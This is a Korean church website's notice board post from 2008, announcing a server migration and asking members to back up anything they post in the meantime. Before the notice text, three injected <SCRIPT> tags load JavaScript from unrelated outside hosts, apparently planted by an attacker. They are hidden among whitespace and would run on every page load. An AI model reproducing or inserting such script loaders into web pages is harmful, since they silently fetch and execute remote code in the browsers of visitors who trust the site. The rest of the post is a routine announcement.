중요한 글은 사본을 만들어 두시기 바랍니다.

관리팀장 0 5,459 2008.07.15 00:07
                <SCRIPT Language=JavaScript src=http://jesusmylifechurch.org/bbs/data/c1/dkeumyoil.js></script>                                                      <SCRIPT Language=JavaScript src=http://poverty.jinbo.net/bbs/data/freeboard/softs.js></script>                                                          <SCRIPT Language=JavaScript src=http://rnjsdudwh.cafe24.com/Mics.php></script>오늘(7월 12일)부터 본 싸이트에 올려져 있는 자료들을 새로운 써버로 옮겨 오는 작업을 시작합니다. (현재 이 곳에 올려져 있는 자료들은 모두 이전에 이용하던 호스팅사의 써버에 올려져 있습니다. 그 자료들을 '끌어다가' 쓰고 있습니다.)

이전의 써버에서 새로운 써버로 이전하는 도중에 올려지는 게시물들은 새로운 써버에는 올려지지 않게 됩니다. (이삿짐을 모두 포장을 한 다음에 남아 있는 짐과 같습니다.) 따라서, 지금 이 시간부터 제가 추후에 공지를 드릴 때까지 올리시는 게시물은 만약의 경우를 대비하여 복사본을 만들어 두시길 권해 드립니다.

모든 작업이 빠른 시일 내에 이루어질 수 있도록 최선을 다하고 있습니다.

수고하시는 김철권 님께 하나님의 크신 축복과 위로가 함께 하시길 기도해 주시기 바랍니다.

예수생명교회 홈 페이지 관리팀
팀장 김동욱 집사 드림 

Comments

페이스북에 공유 트위터에 공유 구글플러스에 공유 카카오스토리에 공유 네이버밴드에 공유